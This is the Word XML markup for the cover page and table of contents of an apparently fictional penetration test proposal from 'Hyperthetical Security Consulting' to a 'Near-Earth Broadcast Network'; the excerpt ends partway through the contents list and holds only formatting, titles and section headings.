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6629" w14:textId="772558CF" w:rsidR="000E2AB3" w:rsidRPr="005264D0" w:rsidRDefault="00B920E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B920E2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ECCFC6D" wp14:editId="19845E1B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>4352925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>7134225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="17049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4975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="16A1C8DF" w14:textId="323E86D8" w:rsidR="00B920E2" w:rsidRPr="00B920E2" w:rsidRDefault="00B920E2" w:rsidP="00B920E2">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B920E2">
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="50B4C8" w:themeColor="accent1"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t>Hyperthetical Security Consulting</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B920E2">
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>6 MetroTech Center,</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B920E2">
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>Brooklyn, NY</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B920E2">
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:br/>
                              <w:t>11201</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3CB5A8B1" w14:textId="76D1A74D" w:rsidR="00B920E2" w:rsidRPr="00B920E2" w:rsidRDefault="00B920E2" w:rsidP="00B920E2">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="50B4C8" w:themeColor="accent1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00B920E2">
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="50B4C8" w:themeColor="accent1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:t>https://hyperthetica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CCFC6D" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:342.75pt;margin-top:561.75pt;width:185.9pt;height:134.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="16A1C8DF" w14:textId="323E86D8" w:rsidR="00B920E2" w:rsidRPr="00B920E2" w:rsidRDefault="00B920E2" w:rsidP="00B920E2">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B920E2">
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="50B4C8" w:themeColor="accent1"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                        <w:t>Hyperthetical Security Consulting</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B920E2">
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>6 MetroTech Center,</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B920E2">
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>Brooklyn, NY</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B920E2">
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>11201</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3CB5A8B1" w14:textId="76D1A74D" w:rsidR="00B920E2" w:rsidRPr="00B920E2" w:rsidRDefault="00B920E2" w:rsidP="00B920E2">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="50B4C8" w:themeColor="accent1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B920E2">
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="50B4C8" w:themeColor="accent1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:t>https://hyperthetical.com</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin" anchory="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003719FB" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657215" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17CE82BB" wp14:editId="5C71B04E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5095876</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-914400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2667000" cy="10029825"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Rectangle 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2667000" cy="10029825"/>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A804" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:401.25pt;margin-top:-1in;width:210pt;height:789.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" fillcolor="black [3213]" stroked="f">
                <w10:wrap anchorx="page"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008C4153" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4219FB1F" wp14:editId="6DAC6A45">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>7219315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3525520" cy="861695"/>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5520" cy="861695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0032484C" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C32505F" wp14:editId="726FA1DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-752475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1133475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="741045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619250"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2F6FE3B5" w14:textId="378D586D" w:rsidR="0032484C" w:rsidRPr="0032484C" w:rsidRDefault="0032484C" w:rsidP="0032484C">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:jc w:val="right"/>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="50B4C8" w:themeColor="accent1"/>
                                <w:sz w:val="96"/>
                                <w:szCs w:val="96"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0032484C">
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="50B4C8" w:themeColor="accent1"/>
                                <w:sz w:val="96"/>
                                <w:szCs w:val="96"/>
                              </w:rPr>
                              <w:t>Penetration Test Proposal</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="44860EA3" w14:textId="7A2310D7"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Near-Earth Broadcast Network</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E49EF6F" w14:textId="57689F0A"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0</w:t>
                            </w:r>
                            <w:r w:rsidR="008C4490">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>5</w:t>
                            </w:r>
                            <w:r w:rsidRPr="0032484C">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r w:rsidR="008C4490">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>01</w:t>
                            </w:r>
                            <w:r w:rsidRPr="0032484C">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>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505F" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-59.25pt;margin-top:89.25pt;width:583.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2F6FE3B5" w14:textId="378D586D" w:rsidR="0032484C" w:rsidRPr="0032484C" w:rsidRDefault="0032484C" w:rsidP="0032484C">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:jc w:val="right"/>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="50B4C8" w:themeColor="accent1"/>
                          <w:sz w:val="96"/>
                          <w:szCs w:val="96"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0032484C">
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="50B4C8" w:themeColor="accent1"/>
                          <w:sz w:val="96"/>
                          <w:szCs w:val="96"/>
                        </w:rPr>
                        <w:t>Penetration Test Proposal</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="44860EA3" w14:textId="7A2310D7"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Near-Earth Broadcast Network</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E49EF6F" w14:textId="57689F0A"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0</w:t>
                      </w:r>
                      <w:r w:rsidR="008C4490">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>5</w:t>
                      </w:r>
                      <w:r w:rsidRPr="0032484C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r w:rsidR="008C4490">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>01</w:t>
                      </w:r>
                      <w:r w:rsidRPr="0032484C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>/2023</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0032484C" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73007AA1" wp14:editId="142361C7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>3762375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3457575" cy="3457575"/>
            <wp:effectExtent l="38100" t="38100" r="47625" b="476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57575" cy="3457575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="28575">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0032484C" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BE31E35" wp14:editId="3FA1BEB5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>971550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7753350" cy="2000250"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Rectangle 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7753350" cy="20002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A0BB" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:76.5pt;width:610.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" fillcolor="black [3213]" stroked="f"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E2AB3" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1132630467"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="680CB08C" w14:textId="250F7D1A" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="322683FB" w14:textId="6EF0DBB8" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc129370235" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summar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0AA1FCF1" w14:textId="29273983" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370236" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</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03716B58" w14:textId="112CDEBE" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370237" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Goals and Objectiv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7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312FAE84" w14:textId="568BE9D7" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370238" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope Overview</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8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0D46C37D" w14:textId="41B8B642" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370239" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>In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9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6EC65B76" w14:textId="11DC7564" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370240" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Out of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0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4AAFC1E4" w14:textId="23038824" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370241" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Methods and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1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53AE23C4" w14:textId="3352A3A9" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370242" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detailed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2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5A9EEB2C" w14:textId="0E23003D" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370243" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
